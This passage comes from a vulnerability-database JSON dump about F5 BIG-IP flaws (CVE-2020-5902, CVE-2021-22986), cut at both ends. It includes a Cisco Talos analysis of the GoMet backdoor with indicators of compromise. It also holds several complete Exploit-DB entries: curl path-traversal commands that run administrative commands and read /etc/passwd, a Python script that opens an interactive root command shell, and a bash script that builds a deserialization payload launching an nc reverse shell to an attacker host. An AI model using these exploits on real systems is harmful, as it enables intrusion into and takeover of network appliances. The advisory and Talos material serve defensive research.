"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-02-11T17:00:05", "id": "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "href": "https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in F5 BIG-IP Traffic Management User Interface\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-05T00:00:00", "type": "dsquare", "title": "F5 BIG-IP Traffic Management User Interface File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-05T00:00:00", "id": "E-709", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-07-07T09:54:15", "description": "By Jon Munshaw. Cisco Talos just released Snort coverage for a prominent vulnerability in F5\u2019s BIG-IP. BIG-IP is one of the most popular networking products on the modern market. This product is used to shape web traffic, access gateways, limit rates and much more. F5 disclosed a remote code execution over the weekend that was assigned a maximum 10 out of 10 severity score. CVE-2020-5902 is a remote code execution vulnerability in BIG-IP's configuration interface. Users are urged to make... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/WdHAUZcKoHk)", "cvss3": {}, "published": "2020-07-06T14:19:53", "type": "talosblog", "title": "New Snort rule addresses critical vulnerability in F5 BIG-IP", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-06T14:19:53", "id": "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/WdHAUZcKoHk/snort-rule-f5-rce-critical-vuln.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T15:37:29", "description": "![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZeqlvlWybp65J__jmWO7aplRNTWdc7WeGeR5kcgeQ53bHlHQyhxVLJyWt2seTy5EV10zwvifEGMJt3WHFlJYnk6STRyXBh2qFgEcTp6-uW_eH-6fjyVZUSHqDHQ97YkzS9jyOd01tIT3SufyCCVH3X-P-p-vezNnt7Rxyo5Y_Sv2UMSFaw_bE4kG-/s16000/image1.jpg) \n \n \n\n\n## Executive summary\n\n \n\n\nSince the Russian invasion of Ukraine began, Ukrainians have been under a [nearly constant barrage of cyber attacks](<https://blogs.cisco.com/news/cisco-stands-on-guard-with-our-customers-in-ukraine>). Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine \u2014 this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named \"[GoMet](<https://github.com/Laeeth/GoMet>).\" The malware was first observed on March 28, 2022. \n \n \n\n\n## GoMet backdoor\n\n \n\n\nThe story of this backdoor is rather curious \u2014 there are two documented cases of its usage by sophisticated threat actors. First, in 2020, attackers were deploying this malware after the successful exploitation of [CVE-2020-5902](<https://blog.talosintelligence.com/2020/07/snort-rule-f5-rce-critical-vuln.html>), a vulnerability in F5 BIG-IP so severe that USCYBERCOM posted a [tweet](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) urging all users to patch the application. The second is more recent and involved the [successful exploitation](<https://news.sophos.com/en-us/2022/06/15/sophos-uncovers-how-apt-groups-carried-out-highly-targeted-attack/>) of [CVE-2022-1040](<https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce>), a remote code execution vulnerability in Sophos Firewall. \n \nBoth cases are very similar. They both start with the exploitation of a public vulnerability on appliances where the malicious actors then dropped GoMet as a backdoor. As of publishing time, Cisco Talos has no reason to believe these cases are related to the usage of this backdoor in Ukraine. \n \nThe original GoMet author posted the code on GitHub on March 31, 2019 and had commits until April 2, 2019. The commits didn't add any features but did fix some code convention aesthetics. The backdoor itself is a rather simple piece of software written in the Go programming language. It contains nearly all the usual functions an attacker might want in a remotely controlled agent. Agents can be deployed on a variety of operating systems (OS) or architectures (amd64, arm, etc.). GoMet supports job scheduling (via Cron or task scheduler depending on the OS), single command execution, file download, file upload or opening a shell. An additional notable feature of GoMet lies in its ability to daisy chain \u2014 whereby the attackers gain access to a network or machine and then use that same information to gain access to multiple networks and computers \u2014 connections from one implanted host to another. Such a feature could allow for communication out to the internet from otherwise completely \"isolated\" hosts. \n \nThis version was changed by malicious actors, in the original code, the cronjob is configured to be executed once every hour on the hour. In our samples, the cronjob is configured to run every two seconds. This change makes the sample slightly more noisy since it executes every two seconds, but also prevents an hour-long sleep if the connection fails which would allow for more aggressive reconnection to the C2. \n \nThe objective of the cron job defined in the main part of the malware is to check if it's connected to the C2, if not it will start the agent component again and connect to the C2. The picture below shows the execution flow of the C2 setup routine Agent.Start. \n \n\n\n![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkGkN7oYZULYZmD1fPf6bgKzob_cDDx7pNdm4kFra2nRIK_kZVezm1alMyBD3WGI0lVeBF5s2U6ipyScjnmTNpErwPDfdjzbxf-9SYTB05istg_XcZELX3DmeDQD_jn8hhFMBZd0QclzSBOvj0fuO32sbjV-Rxpv__P4MYo2ycWNkJXpU4OsUUy6Zw/w640-h624/image5.png)\n\n \nThis flow reveals another change to the GitHub versions. If the C2 is unreachable, the sample will sleep for a random amount of time between five and 10 minutes. GO's sleep implementation uses nanoseconds. The Pseudo Code would look like the following: time_Sleep(1000000000 * (rnd_val + 300)). \n \nThe 'WaitGroup_Add' call in the disassembly screenshot can also be confusing. The trick is, the Go compiler is changing the source code WaitGroup.Done() to WaitGroup.Add(-1). \n \nAfter the Agent.start routine is done, the next cron job triggered the execution of the serve() routine and tried to start another instance of the Agent. \n \nThe simplified source code of the GitHub version looks like this: \n \n\n\n![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-ZkP4sgLxsQEr14rReSpyBy89QihaUHtj38Ns__gmp6LLSLiQX4JjCceKqTVy-HBFJ6eVxtA32IxTk2RVUDTMu9whKsT0p6ctP4Nd-mju-H8HciKPasWLmwMSq75sLiD0fGD4CXJzOGfUVlYT7aohIXwll80H_a4KxQBlbCeDNStptC8u5ywu3Qw/w640-h532/image4.png)\n\n \n \nThe simplified pseudo-code for the samples in the wild looks like this: \n \n\n\n![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSRac3tj6pbL4iyE4DbcYcpok3CkBPc4E2NCPi63sDFgraYEokyXAiGoD-G8WiHFF6hjtWQMl_PdxhOxYh-T48FnV4LUdsV-vdR0SW3VnRx3S2oPKrwbxyxIxzQ4SNwN_vaQJkOjetizHjlYOcSuhn7gxoRQD517RgH2hNVydNQGtMQh4DeQ87vnx8/w640-h532/image3.png)\n\n \n \nTalos found two samples of this version of the backdoor: \n \nf24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (FctSec.exe) \n \n950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SQLocalM86.exe) \n \nThese samples have minor differences but are likely built from the same source code, just with a slightly different configuration. \n \nIf we look closely at the functions, they are not 100% equal, but we can see that the changes are mainly strings and similar victim or compiler-dependent data, along with researcher comments. Below is the Main.Main function as an example. \n \n\n\n![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUN6PLRF1B2QZw1uy0C2owOdTianaYaraH62I_cQsVVMcvas-RocHHQpa3x-F5dgyM8gsAtY9KaxLihljs8olU5gIVk86CnPw7T2WR0CfuUhKNPkkZVpxzEBSgK3eBWy0iVd_Ap5pejExK7twzcMyEX7nbue1aMTHlg507ncTVaU2Wm9TpK71acK8d/w640-h454/image6.png)\n\n \n \nThe malicious activity we detected included a fake Windows update scheduled tasks created by the GoMet dropper. Additionally, the malware used a somewhat novel approach to persistence. It enumerated the autorun values and, instead of creating a new one, replaced one of the existing goodware autorun executables with the malware. This potentially could avoid detection or hinder forensic analysis. \n \nIn one of the cases, about 60 seconds before the schtask query is executed, a blank CMD process is opened and then subsequently executes systeminfo and schtask queries rather than these queries being chain opened by svchost or services or another process. This execution looks like: \n \nC:\\WINDOWS\\system32\\cmd.exe 7) \n \nsysteminfo \n \nschtasks /query /tn microsoft\\windows\\windowsupdate\\scheduled \n \nschtasks /query /tn microsoft\\windows\\windowsupdate\\scheduled /v \n \n \n\n\n## Infrastructure\n\n \n\n\nBoth samples have the command and control (C2) IP address hardcoded, which is 111.90.139[.]122. Communication occurs via HTTPS on the default port. \n \nThe certificate on this server was issued on April 4, 2021 as a self-signed certificate, with the 9b5e112e683a3605c9481d8f565cfb3b7e2feab7 SHA-1 fingerprint. This indicates that this campaign preparation began as early as April 2021. At the moment, there are no known domains associated with this IP address and the last time there was a domain associated with it was on Jan. 23, 2021, which is outside the known attack time frame. \n \n \n\n\n## Conclusion\n\n \n\n\nAs the war in Ukraine rages on with little resolution in sight, we are reminded that attackers will try just about anything to gain additional leverage over their Ukrainian adversaries. Cisco Talos expects to see the continued deployment of a range of cyber weapons targeting the Ukrainian government and its counterparts. We remain vigilant and are committed to [helping Ukraine defend its networks](<https://blogs.cisco.com/news/cisco-stands-on-guard-with-our-customers-in-ukraine%23:~:text%3DAs%2520the%2520Russia%252Dled%2520invasion,ensure%2520that%2520nothing%2520goes%2520dark.>) against such cyber attacks and working closely with our strategic allies in the region to gather and [provide actionable threat intelligence](<https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html>). \n \nIn this instance, we saw a software company targeted with a backdoor designed for additional persistent access. We also observed the threat actor take active steps to prevent detection of their tooling by obfuscating samples and utilizing novel persistence techniques. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways \u2014 this is just the latest example of those attempts. \n \nWe assess with moderate to high confidence that these actions are being conducted by Russian state-sponsored actors or those acting in their interests. \n \n \n\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below. \n \n\n\n![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKNd81JmXt2A-s9v9MN1KPPzmlbWUlVCq2Dn4cQoWC_oWxMrPxDGcFZQNGmU0Rvoiw0c9MBmIent4j4uABiGCqBgv1V-kdHyWDErELPC2_OZVKb83ZdIglB5oymQxS7GM2EdptjsPTNWxbP6RQYslKFyhBH601WCD0HMCMEkk_22nRQCh_BQ-ewzjR/w492-h640/image2.jpg)\n\n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Network/Cloud Analytics](<https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html>) (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source%3Dtalos%26utm_medium%3Dreferral%26utm_campaign%3Dduo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n \n\n\n## Indicators of Compromise\n\n### SHA-256 Hashes\n\nf24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb \n950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 \n \n\n\n### IPs\n\n111.90.139[.]122", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T12:00:00", "type": "talosblog", "title": "Attackers target Ukraine using GoMet backdoor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2022-1040"], "modified": "2022-07-21T13:27:08", "id": "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "href": "http://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:06:52", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T00:00:00", "type": "exploitdb", "title": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-05T00:00:00", "id": "EDB-ID:48643", "href": "https://www.exploit-db.com/exploits/48643", "sourceData": "## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'", "sourceHref": "https://www.exploit-db.com/download/48643", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:05:12", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22986", "CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "EDB-ID:49738", "href": "https://www.exploit-db.com/exploits/49738", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)\r\n# Exploit Author: Al1ex\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2\r\n# CVE : CVE-2021-22986\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nimport sys\r\n\r\n\r\ndef title():\r\n print('''\r\n ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \r\n / |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \r\n | ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \r\n | | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \r\n | `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \r\n \\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \r\n \r\n Author:Al1ex@Heptagram\r\n Github:https://github.com/Al1ex\r\n ''') \r\n\r\ndef exploit(url):\r\n\ttarget_url = url + '/mgmt/shared/authn/login'\r\n\tdata = {\r\n\t\t\"bigipAuthCookie\":\"\",\r\n\t\t\"username\":\"admin\",\r\n\t\t\"loginReference\":{\"link\":\"/shared/gossip\"},\r\n\t\t\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"}\r\n\t}\r\n\theaders = {\r\n\t\t\"User-Agent\": \"hello-world\",\r\n\t\t\"Content-Type\":\"application/x-www-form-urlencoded\"\r\n\t}\r\n\tresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)\r\n\tif \"/mgmt/shared/authz/tokens/\" not in response.text:\r\n\t\tprint('(-) Get token fail !!!')\r\n\t\tprint('(*) Tested Method 2:') \r\n\t\theader_2 = {\r\n\t\t 'User-Agent': 'hello-world',\r\n\t\t 'Content-Type': 'application/json',\r\n\t\t 'X-F5-Auth-Token': '',\r\n\t\t 'Authorization': 'Basic YWRtaW46QVNhc1M='\r\n\t\t}\r\n\t\tdata_2 = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c whoami\"\r\n\t\t}\r\n\t\tcheck_url = url + '/mgmt/tm/util/bash'\r\n\t\ttry:\r\n\t\t\tresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)\r\n\t\t\tif response2.status_code == 200 and 'commandResult' in response2.text:\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tcmd = input(\"(:CMD)> \")\r\n\t\t\t\t\tdata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)}\r\n\t\t\t\t\tr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)\r\n\t\t\t\t\tif r.status_code == 200 and 'commandResult' in r.text:\r\n\t\t\t\t\t\tprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\t\telse:\r\n\t\t\t\tprint('(-) Not vuln...')\r\n\t\t\t\texit(0)\r\n\t\texcept Exception:\r\n\t\t\tprint('ERROR Connect')\r\n\tprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]))\r\n\twhile True:\r\n\t\tcmd = input(\"(:CMD)> \")\r\n\t\theaders = {\r\n\t\t\t\"Content-Type\": \"application/json\",\r\n\t\t\t\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])\r\n\t\t}\r\n\t\tdata_json = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd)\r\n\t\t}\r\n\t\texp_url= url + '/mgmt/tm/util/bash'\r\n\t\texp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)\r\n\t\tif exp_req.status_code == 200 and 'commandResult' in exp_req.text:\r\n\t\t\tprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\telse:\r\n\t\t\tprint('(-) Not vuln...')\r\n\t\t\texit(0)\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 2):\r\n \tprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0]))\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1])", "sourceHref": "https://www.exploit-db.com/download/49738", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T04:10:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "exploitdb", "title": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-5902", "CVE-2020-5902"], "modified": "2020-07-06T00:00:00", "id": "EDB-ID:48642", "href": "https://www.exploit-db.com/exploits/48642", "sourceData": "#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. \\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex", "sourceHref": "https://www.exploit-db.com/download/48642", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:06:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-26T00:00:00", "type": "exploitdb", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 